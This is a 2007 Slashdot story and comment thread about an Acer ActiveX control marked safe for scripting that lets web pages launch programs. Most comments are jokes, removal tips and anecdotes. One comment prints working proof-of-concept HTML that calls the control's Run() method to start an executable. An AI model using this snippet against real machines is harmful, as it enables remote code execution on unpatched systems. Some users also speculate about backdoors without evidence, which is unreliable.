Forgot your password?
typodupeerror
Privacy Security Your Rights Online

Acer May Be Bugging Computers 396

Posted by Zonk
from the might-want-to-look-into-this dept.
tomjen writes "What if a well known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"
This discussion has been archived. No new comments can be posted.

Acer May Be Bugging Computers

Comments Filter:
  • But dude... (Score:5, Funny)

    by Thaidog (235587) <(slashdot753) (at) (nym.hush.com)> on Monday January 08, 2007 @01:47AM (#17504716)
    They're Ferrari's
  • by mallardtheduck (760315) <stuartbrockman@nOSPam.hotmail.com> on Monday January 08, 2007 @01:49AM (#17504740)
    I expect exploits for this to start appearing within days, if not hours...
  • by Phil246 (803464) on Monday January 08, 2007 @01:55AM (#17504766)
    Checked mine, its present :( Anyone know if its safe to make that file and its registry entry 'disappear' ?
    • Safe (Score:2, Informative)

      by twitter (104583)

      Checked mine, its present :( Anyone know if its safe to make that file and its registry entry 'disappear' ?

      Sure, just go get the Mepis Patch [mepis.org]. This will end all of your activeX problems. It won't end your Flash, Adobe and other problems but those are minor in comparison.

      Really, do you think eliminating this one control will make your computer safe? Chances are there are coppies that will "respawn" later, a common malware trick, and that there are far nastier controls you don't know about. The malic

      • by Phil246 (803464)
        No, but it will make it safer (if only a little) then leaving it there.
        Ive set its kill bit in the mean time though
    • by valeurnutritive (1048314) on Monday January 08, 2007 @02:22AM (#17504954)
      To remove this from your machine.

      Goto Start > Run and type:
      regsvr32 -u lunchapp.ocx

      (-u for uninstall)
      • by Phil246 (803464)
        thankyou :)
  • The 4th USB port (Score:4, Interesting)

    by wikinerd (809585) on Monday January 08, 2007 @01:57AM (#17504782) Journal
    I once bought a Fujitsu-Siemens laptop with 3 USB ports, but when I opened it I noticed it had a non-visible 4th USB port near the hard disk that you needed a screwdriver in order to access. No mention of it in Fujitsu-Siemen's manuals and other documentation that I got with the laptop, and no mention of it on their website. Although visually hidden, the port was visible via diagnostics software. I thought that this could be one way to put a spy antenna or other device on a laptop (a USB port provides 500mA of power which is enough to power a large range of antennas and electronics). It could be used to put an anti-theft antenna revealing the laptop's location, to put a keylogger, or to put a backup device. In the end I just put a permanent flash key drive in it so I had a laptop with permanent flash storage in addition to the hard disk.
    • by mallardtheduck (760315) <stuartbrockman@nOSPam.hotmail.com> on Monday January 08, 2007 @02:06AM (#17504844)
      Could just be there for optional "built-in" bluetooth or Wifi. A USB module is probably cheaper than an Mini-PCI.
      Plus, if they do no wireless, Wifi-only and Wifi+BT models, with a single Mini-PCI slot, they would need both Wifi and Wifi+BT cards, if they have a "hidden" USB port, they only need to stock Wifi mini-PCI cards and USB bluetooth adapters, the same adapters that are sold independently.
    • Re: (Score:3, Insightful)

      by starwed (735423)
      When I bought a USB2 PCI card for my desktop, most models had a single internal USB port as well as all the external ones. I think this is pretty common, and nothing nefarious.
    • It's an appendix. (Score:5, Interesting)

      by Kadin2048 (468275) <slashdot.kadin@x[ ].net ['oxy' in gap]> on Monday January 08, 2007 @02:42AM (#17505076) Homepage Journal
      I think a lot of computers have internal ports that were put in there as part of the original board design, but were never taken advantage of during configuration or subsequent system design.

      In an old Mac of mine (G4 "Sawtooth"), there is an internal Firewire port right on the motherboard, even though there are virtually no (to my knowledge anyway) internal Firewire devices available. The most useful thing you can do with it is run it out to a dummy card-slot panel and give yourself an extra external port. (I suppose you could also run another HD by using a IDE to FW converter card, if you could find a small enough one.)

      It's there, I suspect, because when they were designing that mobo, it wasn't clear that Firewire would be used primarily for DV and external peripherals, and wouldn't become the internal-peripheral interconnect of choice. For all the designers knew, Firewire could have become like SATA is today, with hard drives being built for it natively. In that case, having one inside the case could be useful as hell (particularly since that machine has space for 4 or 6 internal 3.5" HDs and 2 removable-media drives). They had no way of knowing that it would end up being the electronics version of an appendix.

      I suspect if you were to look around closely at the first generations of a lot of technologies, you'd find a lot of things like this; design decisions made for possibilities that just didn't pan out, but were left there anyway.
      • Re: (Score:3, Informative)

        by Zouden (232738)
        I suspect if you were to look around closely at the first generations of a lot of technologies, you'd find a lot of things like this; design decisions made for possibilities that just didn't pan out, but were left there anyway.


        Like multiple camera angles on DVDs? There's even a 'camera' button taking up space on my remote.
        • Multiple Angles (Score:3, Insightful)

          by splutty (43475)
          This is getting to be way off topic, but seriously. It seems you don't know the primary reason of existence for DVDs, which is something that the multi angle button is used in quite a lot.

          Of course I'm talking about the driving force behind almost all new electronical inventions, the Pr0N.
        • Re: (Score:3, Funny)

          by Hoi Polloi (522990)
          I use it when watching my Simpsons DVDs. I like to see what the other camera angles caught during filming.

          The extras where Homer works up the live studio audience before filming a show are great too.
      • PHB == appendix (Score:5, Interesting)

        by TapeCutter (624760) on Monday January 08, 2007 @06:08AM (#17506050) Journal
        I know that some, but certainly not all, "hidden" hardware/software is the result of a PHB "work-around", I submit the following anecdote about illogical engineering vs optimal solutions....

        Many moons ago I worked on a large project where we supplied a logistics application along with 8000 laptops that we were also expected to maintain. The spec's for the laptop's were written into the $80M/5yr contract, in particular the contract specified "special" (ie: manafactured by our sister company) laptops with a 120M HDD. A thousand or so laptops were delivered immediately, I suspect this was mainly to garner a large initial payment, 800 were then stored in a warehouse by the customer for 2yrs while we wrote the software and ran a pilot with the other 200.

        When it came time to ramp up to full production we found we could no longer get 120M HDD's but could get 250M for the same price (the HDD's were third party PCMCIA cards that were supposed to be "pre-imaged" by the hardware guys). The Dilbert moment happened when a PHB with way too much time on his hands had to sign the purchase order and demanded 120M HDD's because "that's what's it says in the contract". The solution was illogical but effective, we quietly arranged for our hardware friends to format the 250M physical drive into a 120M logical drive and ignore the remaning space (and told them why). A few PHB readable edits to the PO and hey presto a warehouse full of laptops with our software pre-installed on 120M drives and an extra PHB-invisible partion.

        Now throwing away half the drive is clearlly illogical but in my mind it was the "optimal" solution, with the possible exception of a time consuming appendectomy that would gum up the workflow for weeks/months and could possibly result in a devil we didn't know taking over. I also say "optimal" because: The PHB belived he had asserted his authority over the project and a rival PHB in the sister company, all with just one demand. From what I recall he went off to pester someone else and gloat about it. Not only did it nueter the PHB but HR, the lawyers and the accountants were kept in their cages, the techies got a good laugh, and the customer remained oblivious to the whole fiasco.

        Finally, a year or so into production when the image size started to bloat towards the 120M limit, the same PHB asked for a costing to retrofit bigger drives, like any good salesman we umm'ed and ahh'ed then went off to "see what we could do" before announcing we could remotely activate a new D: drive on a standard update cycle using some simple "magic" and a couple of mandays labour. The news delighted the PHB who promptly added a manday for his own "time". We didn't even hint that it was his previous demand had caused the current space squeeze, we simply saved our eveidence in case an appendectomy was required at some future random impasse. We also saved all the "can do" brownie points for the next time we had to convince the same PHB that his proposed solution to some imaginary problem really, truly, is a "can't do" situation, regardless of what PC week says.
        • Re: (Score:3, Insightful)

          When it came time to ramp up to full production we found we could no longer get 120M HDD's but could get 250M for the same price (the HDD's were third party PCMCIA cards that were supposed to be "pre-imaged" by the hardware guys). The Dilbert moment happened when a PHB with way too much time on his hands had to sign the purchase order and demanded 120M HDD's because "that's what's it says in the contract". The solution was illogical but effective, we quietly arranged for our hardware friends to format the 2
  • by zappepcs (820751) on Monday January 08, 2007 @02:00AM (#17504814) Journal
    to think that Acer and others have not been doing this for years? Put on the tin foil hat now, they may be doing so in conjunction with governments. Lets not stop there, your ISP and phone company might also be doing the same thing?

    I bet that buried in the EULA somewhere is a statement about remote support or some other such thing that would negate any complaints about this code as far as culpability goes. Wonder what they will do now that the botnet boys know its there? Just one more reason that people who want to have a safe computer should learn how to administer one properly... IMO.
    • Re: (Score:3, Insightful)

      by Telvin_3d (855514)
      While I agree with you in general paranoid principle, I think the last bit is a little naive. It's like saying that if you want to have a safe house, you should be able to build your own in order to make sure there is no secret explode-on-remote-command hardware installed. Yes, people need to pay a little attention, but this type of shit is above and beyond anything that should be expected.

      P.S. I want to see Holmes on Homes run across a secret explode-on-remote-command thing in an episode. That would mak
      • Re: (Score:3, Interesting)

        by zappepcs (820751)
        I was thinking that 'meh, Telvin is probably right' but I thought about it again. Not to take an opportunity to diss you or anyone, but rather to explain my point a bit better.

        Anyone, almost, can get a license to drive a car. The few that will put power steering fluid in their oil because they know nothing about cars will learn a very expensive lesson. There are many examples here where just a grounding of common sense would save people from very costly and perhaps embarrassing episodes. There are awards ev
  • Lessons learned... (Score:5, Insightful)

    by Anonymous Coward on Monday January 08, 2007 @02:11AM (#17504882)
    1) Whenever possible, build your own.

    2) When you can't build your own (laptops), *always* re-install your OS after purchasing a new computer, and for God's sake use a real install CD and not the recovery one provided by the manufacturer.
    • Re: (Score:3, Insightful)

      by GaryPatterson (852699)
      Excellent suggestion!

      So, for the other 99% of users (you know, the ones who just want a computer that does what it's advertised to do), what's the solution?
  • Can't...get...back...contr...Everything is Fine and Happy. Nothing to Worry About. Have a Nice Day!
         
  • by snicho99 (984884) on Monday January 08, 2007 @02:15AM (#17504912) Homepage
    Don't panic. It's not a method for launching applications.

    The original article failed to notice that it's a Lunch application. It's actually a throw back to when Acer briefly partnered up with 180solutions to deliver targeted pop-under sandwiches to hungry laptop owners. The idea being that after seventeen hours of trying to uninstall Bonsai Buddy the computer user would be debilitated through starvation and susceptible receptive to sp(iced h)am..

    The program was abandoned when Acer's engineers failed to perfect the wasabi-over-ip protocol - leaving the whole system unreliable an prone to bagel overrun.

  • SWAH!?! (Score:5, Funny)

    by foo fighter (151863) on Monday January 08, 2007 @02:21AM (#17504948) Homepage
    This news is unbelievable.

    Acer still makes computers? People still buy them?

    I remember Acer being a budget brand with a bad rep for quality and customer service back in the mid- to late-90s. I can't believe they are still a going concern.
     
    • by pchan- (118053)
      Acer is the number 4 maker of personal (ie, non-server) computers in the world, behind HP, Dell, and Lenovo and ahead of Apple. At least that's what the statistics say, I've yet to see anyone using an Acer.
      • I've yet to see anyone using an Acer.

        Look harder?
        Every other laptop I see these days is an Acer. Hell, I'm on an Acer right now (the Aspire series run Solaris fantastically).
        Quality's not bad on them these days and they're about half the price of the exact same laptop rebranded (Toshiba made a line of laptops that had the same hardware including case as the Aspire's, I imagine they were just rebrands)
  • Late again! (Score:5, Informative)

    by whoever57 (658626) on Monday January 08, 2007 @02:32AM (#17505014) Journal
    Apparently, someone in Brazil noticed this last November [extremepc.com.br]
  • 1. Format your hard disk 2. Install Linux 3. Return your Windows for a refund (Profit!)
  • by mlts (1038732) on Monday January 08, 2007 @02:43AM (#17505082)
    On all new computers, be PCs, Suns, RS/6000s, or anything, after getting the machine out of the box and plugged in, I tar (or ghost in the case of PC recovery partitions) off anything preinstalled to two backups, then format the hard disk (or disks/arrays) on the machine. After the disks are formatted, I then install the OS and drivers and get the machine to the latest patches that I can via CDs. Only after this and a lockdown check does the machine see the network.

    I've just seen too many machines come pre-hosed from the factory. For anything that sees production use, I want to pack my own parachute and know exactly what is on the machine.

    On PCs, I try to find drivers from the underlying OEM rather than depend on the PC vendor, as usually the PC vendor's drivers tend to be outdated, except for motherboard/system board/IO planar flash.
  • Anyone would be that utterly deceptive...I mean...certainly not a manufacturer of hardware...or certainly not a major software developer...uh...oh, I forgot, except for those accidental bugs in the OS software...and indeed the unfortunate BBBBrowser.
  • Notice that in the article if you have IE7 it'll stop the attack since the user will be notified the page executes an unknown ActiveX and ask for permission (in the yellow creeping bar) before doing anything.

    Of course IE7 is only at 20% vs IE6 at more than 60%, but still, shows the browser going in the right direction.
  • On behalf of Acer (Score:3, Insightful)

    by Qbertino (265505) on Monday January 08, 2007 @03:55AM (#17505470)
    Acer is one of the 'big name' Laptop producers that actually sell Laptops with Linux preinstalled that are generally available and visible [alternate.de] and don't require placement of a special order at headquarters overseas. And they let you notice the price difference to the same models with Windows on them.
    Solution to this 'bug': If you buy an Acer, by one that comes with Linux.
  • pre-owned? (Score:5, Funny)

    by BigBuckHunter (722855) on Monday January 08, 2007 @04:58AM (#17505770)
    Kinda changes the definition of a "pre-owned" machine!

    BBH
  • Test/exploit code (Score:4, Informative)

    by Koyaanisqatsi (581196) on Monday January 08, 2007 @07:54AM (#17506598)
    The code to test for the vulnerability, right from the Brazilian article about it linked on another post. Save it as an html file and browse it with IE.

    <html>
    <body>
    <object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3A A" id="hahaha">
    </object>
    <script>
    hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
    </script>
    </html>
    </body>

  • by GreatBunzinni (642500) on Monday January 08, 2007 @11:09AM (#17508280)
    When I read this message what popped right on my mind was the existence of an administrator account which camed pre-installed on my Acer laptop. The account is called "ASP.NET Machine A..." which is protected by a password and I'm not able to uninstall it no matter what I try. Can this be another Acer backdoor installed on their systems?

    P.S.: the article's backdoor was also present on my system. those bastards...
    • Re: (Score:3, Interesting)

      No.

      That's just what happens when you install the .NET framework. Apparently you have to run as an administrator to use some of the .NET controls. Solution: Make a .NET account with administrator privileges.

      Pretty cool, huh?

[Crash programs] fail because they are based on the theory that, with nine women pregnant, you can get a baby a month. -- Wernher von Braun

Working...